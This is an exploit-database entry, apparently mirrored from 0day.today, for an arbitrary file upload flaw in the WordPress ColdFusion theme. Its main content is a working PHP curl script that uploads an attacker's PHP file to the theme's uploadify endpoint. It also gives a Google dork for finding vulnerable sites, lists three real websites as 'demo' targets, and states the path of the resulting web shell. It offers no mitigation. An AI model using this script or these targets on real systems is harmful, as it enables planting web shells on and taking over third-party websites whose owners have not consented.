Lucene search
K

WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability

🗓️ 31 Oct 2013 00:00:00Reported by smailmaxType 
zdt
 zdt
🔗 0day.today👁 50 Views

WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability. Exploit allows arbitrary file upload via uploadify feature in Cold Fusion theme

Code
###############################################################
# Exploit Title: WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
# Google dork: inurl:wp-content/themes/ColdFusion/
###############################################################


= = = = = = = =
1)Exploit     =
2)Real Demo   =
= = = = = = = =

1)Exploit :
= = = = = =

<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

2) Exploit demo :
= = = = = = = = =
http://www.laughingcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.alias-photo.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.manuel-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
# #### #### #### #### #### #### #### #### #

Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

# #### #### #### #### #### #### #### #### #
# Facebook Profile : www.fb.com/smailmax
# E-mail : [email protected]
# #### #### #### #### #### #### #### #### #
##### Fi Khatr : > Smail Fox, Ped Rou, Ŝimõõw Any      #####
##### Safouane Saw, RootMax,  DrShano, Novice Exe      #####
##### Abdelaziz Babiz, Youness El Amri, Salah Soultan  #####
##### Âh Mêd, Docteur Virùs, Le-MîSstèr Tàriik         #####
##### Sam7o Li Ila Nsit Chi Wa7d :( ./Smail Max        #####
#####            W    A    L   I   D   A  <3           #####

#  0day.today [2018-04-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation